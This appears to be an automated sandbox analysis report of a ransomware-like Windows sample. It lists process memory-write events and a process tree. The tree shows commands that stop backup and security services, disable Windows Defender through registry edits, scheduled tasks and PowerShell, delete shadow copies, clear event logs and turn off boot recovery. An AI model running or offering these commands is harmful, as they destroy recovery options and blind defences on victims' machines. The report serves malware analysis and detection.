304 wrote to memory of 1416 304 net.exe net1.exe PID 304 wrote to memory of 1416 304 net.exe net1.exe PID 1524 wrote to memory of 628 1524 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe net.exe PID 1524 wrote to memory of 628 1524 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe net.exe PID 1524 wrote to memory of 628 1524 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe net.exe PID 628 wrote to memory of 1776 628 net.exe net1.exe PID 628 wrote to memory of 1776 628 net.exe net1.exe PID 628 wrote to memory of 1776 628 net.exe net1.exe PID 1524 wrote to memory of 1792 1524 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe net.exe PID 1524 wrote to memory of 1792 1524 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe net.exe PID 1524 wrote to memory of 1792 1524 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe net.exe PID 1792 wrote to memory of 1484 1792 net.exe net1.exe PID 1792 wrote to memory of 1484 1792 net.exe net1.exe PID 1792 wrote to memory of 1484 1792 net.exe net1.exe PID 1524 wrote to memory of 1204 1524 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe net.exe PID 1524 wrote to memory of 1204 1524 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe net.exe PID 1524 wrote to memory of 1204 1524 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe net.exe PID 1204 wrote to memory of 1080 1204 net.exe net1.exe PID 1204 wrote to memory of 1080 1204 net.exe net1.exe PID 1204 wrote to memory of 1080 1204 net.exe net1.exe PID 1524 wrote to memory of 980 1524 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe net.exe PID 1524 wrote to memory of 980 1524 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe net.exe PID 1524 wrote to memory of 980 1524 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe net.exe PID 980 wrote to memory of 1752 980 net.exe net1.exe PID 980 wrote to memory of 1752 980 net.exe net1.exe PID 980 wrote to memory of 1752 980 net.exe net1.exe PID 1524 wrote to memory of 1476 1524 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe net.exe PID 1524 wrote to memory of 1476 1524 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe net.exe PID 1524 wrote to memory of 1476 1524 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe net.exe PID 1476 wrote to memory of 2044 1476 net.exe net1.exe PID 1476 wrote to memory of 2044 1476 net.exe net1.exe PID 1476 wrote to memory of 2044 1476 net.exe net1.exe PID 1524 wrote to memory of 1560 1524 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe sc.exe PID 1524 wrote to memory of 1560 1524 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe sc.exe PID 1524 wrote to memory of 1560 1524 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe sc.exe PID 1524 wrote to memory of 1172 1524 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe sc.exe PID 1524 wrote to memory of 1172 1524 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe sc.exe PID 1524 wrote to memory of 1172 1524 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe sc.exe PID 1524 wrote to memory of 1984 1524 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe sc.exe PID 1524 wrote to memory of 1984 1524 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe sc.exe PID 1524 wrote to memory of 1984 1524 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe sc.exe PID 1524 wrote to memory of 1848 1524 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe sc.exe PID 1524 wrote to memory of 1848 1524 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe sc.exe PID 1524 wrote to memory of 1848 1524 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe sc.exe PID 1524 wrote to memory of 1084 1524 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe sc.exe PID 1524 wrote to memory of 1084 1524 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe sc.exe PID 1524 wrote to memory of 1084 1524 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe sc.exe PID 1524 wrote to memory of 384 1524 16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe sc.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe"C:\Users\Admin\AppData\Local\Temp\16d0c9651cae4ca2641f9e875be9f7b39737292eede7a7870b6081922f40b4b1.exe"1⤵
- Modifies extensions of user files
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1524 -
C:\Windows\system32\net.exenet.exe stop "NetMsmqActivator" /y2⤵
- Suspicious use of WriteProcessMemory
PID:544 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "NetMsmqActivator" /y3⤵PID:756
-
C:\Windows\system32\net.exenet.exe stop "SamSs" /y2⤵
- Suspicious use of WriteProcessMemory
PID:752 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SamSs" /y3⤵PID:568
-
C:\Windows\system32\net.exenet.exe stop "SDRSVC" /y2⤵
- Suspicious use of WriteProcessMemory
PID:304 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SDRSVC" /y3⤵PID:1416
-
C:\Windows\system32\net.exenet.exe stop "SstpSvc" /y2⤵
- Suspicious use of WriteProcessMemory
PID:628 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SstpSvc" /y3⤵PID:1776
-
C:\Windows\system32\net.exenet.exe stop "UI0Detect" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1792 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "UI0Detect" /y3⤵PID:1484
-
C:\Windows\system32\net.exenet.exe stop "VSS" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1204 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VSS" /y3⤵PID:1080
-
C:\Windows\system32\net.exenet.exe stop "wbengine" /y2⤵
- Suspicious use of WriteProcessMemory
PID:980 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "wbengine" /y3⤵PID:1752
-
C:\Windows\system32\net.exenet.exe stop "WebClient" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1476 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "WebClient" /y3⤵PID:2044
-
C:\Windows\system32\sc.exesc.exe config "NetMsmqActivator" start= disabled2⤵PID:1560
-
C:\Windows\system32\sc.exesc.exe config "SamSs" start= disabled2⤵PID:1172
-
C:\Windows\system32\sc.exesc.exe config "SDRSVC" start= disabled2⤵PID:1984
-
C:\Windows\system32\sc.exesc.exe config "SstpSvc" start= disabled2⤵PID:1848
-
C:\Windows\system32\sc.exesc.exe config "UI0Detect" start= disabled2⤵PID:1084
-
C:\Windows\system32\sc.exesc.exe config "VSS" start= disabled2⤵PID:384
-
C:\Windows\system32\sc.exesc.exe config "wbengine" start= disabled2⤵PID:2028
-
C:\Windows\system32\sc.exesc.exe config "WebClient" start= disabled2⤵PID:912
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1088
-
C:\Windows\system32\reg.exereg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f2⤵PID:568
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f2⤵PID:1128
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f2⤵PID:1788
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f2⤵PID:1708
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f2⤵PID:288
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f2⤵PID:972
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f2⤵PID:1100
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f2⤵PID:2044
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f2⤵PID:1004
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f2⤵PID:1924
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f2⤵PID:1844
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f2⤵PID:1992
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f2⤵PID:748
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:1988
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:1316
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable2⤵PID:1800
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable2⤵PID:1776
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable2⤵PID:1484
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable2⤵PID:1752
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable2⤵PID:1504
-
C:\Windows\system32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f2⤵PID:1880
-
C:\Windows\system32\reg.exereg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f2⤵PID:1064
-
C:\Windows\system32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f2⤵PID:1860
-
C:\Windows\system32\reg.exereg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f2⤵PID:1556
-
C:\Windows\system32\reg.exereg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f2⤵PID:572
-
C:\Windows\system32\reg.exereg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f2⤵PID:1772
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1928
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:964
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1000
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1212
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies security service
PID:1704 -
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1912
-
C:\Windows\system32\vssadmin.exevssadmin.exe delete shadows /all /quiet2⤵
- Interacts with shadow copies
PID:1080 -
C:\Windows\system32\wevtutil.exewevtutil.exe cl system2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1852 -
C:\Windows\system32\wevtutil.exewevtutil.exe cl security2⤵
- Suspicious use of AdjustPrivilegeToken
PID:924 -
C:\Windows\system32\wevtutil.exewevtutil.exe cl application2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1892 -
C:\Windows\System32\Wbem\wmic.exewmic.exe SHADOWCOPY /nointeractive2⤵
- Suspicious use of AdjustPrivilegeToken
PID:828 -
C:\Windows\System32\Wbem\wmic.exewmic.exe shadowcopy delete2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1344 -
C:\Windows\system32\bcdedit.exebcdedit.exe /set {default} bootstatuspolicy ignoreallfailures2⤵
- Modifies boot configuration data using bcdedit
PID:2064 -
C:\Windows\system32\bcdedit.exebcdedit.exe /set {default} recoveryenabled no2⤵
- Modifies boot configuration data using bcdedit
PID:2088 -
C:\Windows\system32\cmd.execmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All2⤵PID:2108
-
C:\Program Files\Windows Defender\MpCmdRun.exe"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All3⤵
- Deletes Windows Defender Definitions
PID:2128 -
C:\Windows\system32\cmd.execmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true2⤵PID:2140
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIOAVProtection $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2160 -
C:\Windows\system32\cmd.execmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true2⤵PID:2240
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableRealtimeMonitoring $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2260
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD56b820730184d27ba50fc381227baf546
SHA1cd1fd452a86b077378113f0ab6d808f49334363c
SHA2562def2897de0f92de4a34b0304ff7bedd70a8522d7ca47961fbfa81684f2ce90e
SHA5123f26baa4329c23cbc84ab30213518939bacf743ef0fbd79c37508d3bb584b502b1af784bcff3b0e014882bf226c4ecb8e63111d15ce656122a39bcefb97fc4dc